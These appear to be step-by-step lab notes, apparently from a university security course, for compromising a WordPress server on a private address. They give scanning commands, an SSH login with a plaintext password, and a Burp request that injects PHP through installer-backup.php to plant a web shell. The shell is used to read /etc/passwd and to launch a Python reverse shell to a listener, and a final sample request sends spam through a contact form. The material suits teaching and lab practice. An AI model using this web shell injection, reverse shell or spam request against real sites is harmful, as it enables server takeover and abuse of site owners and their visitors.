1. scann


nmap -sV 3.3.3.3 -oN nmap_scan.txt

wpscan --url http://3.3.3.3 -e ap --plugins-version-all --plugins-detection aggressive


2. Perform a manual backup of wp-config.php

From Kali or directly on Ubuntu:
 ssh osboxes@3.3.3.3
 sudo su (-> insert osboxes' password: ituniversity)
 cp /var/www/html/wp-config.php /var/www/html/wp-config.php.working
 chown -R www-data:www-data /var/www/html/

3. exploit & upload -> in Burp (Repeater module): host: 3.3.3.3, port: 80


POST /installer-backup.php HTTP/1.1
Host: 3.3.3.3
Content-Type: application/x-www-form-urlencoded
Connection: close
Connection: close
Content-Length: 244

action_ajax=3&action_step=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=test');
file_put_contents("test.php", '<pre><?php if (isset($_GET["synacktiv_backdoor"])) { echo
shell_exec($_GET["synacktiv_backdoor"]); } ?></pre>'); /*&dbport=12345&


Access http://3.3.3.3/wp-config.php to apply the wp-config 

Access the backdoor (non-interactiv): http://3.3.3.3/test.php?synacktiv_backdoor=cat+/etc/passwd

Access the backdoor (intaractive mode) 
	- from Kali console "nc -l -p 1234" 
	- 3.3.3.3/test.php?synacktiv_backdoor=python+-c+'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.3.3.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  (Interactive shell sent to a remote IP:port)
	- You will have a shell in  your kali terminal where you issued nc in the step above

Other shells that you can try: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet




4. Install the two wordpress plugins for the Sending Spam Lab: contact-form-7.4.6.zip and wp-mail-smtp.1.4.1.zip (attached)


Sample request - not to be used, only as an example (you may have different cookie)

POST / HTTP/1.1
Host: 3.3.3.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://3.3.3.3/
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 306
Cookie: wp-settings-time-1=1545654147; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_872a43f973d6de2a95ce3e25fc65f95d=root%7C1546863352%7Chi3WQqkWXZgh4DKA1RwH3nc8addEgGdxa0uxitKSUqH%7C55a83caf0744b169f2ce0a09f87529880b8fd65b3f6f36fc41eeef62e8dbb857
Connection: close

_wpcf7=5&_wpcf7_version=4.6&_wpcf7_locale=en_US&_wpcf7_unit_tag=wpcf7-f5-p1-o1&_wpnonce=7e257efc30&your-name=iPhone+Cases+for+Sale&your-email=youremail@testemailrandom.uf&your-subject=iPhone+case+for+sale%2C+only+%249&your-message=Bla+bla+visit+this+website%3A+www.iphonecase.blablabla.com&_wpcf7_is_ajax_call=1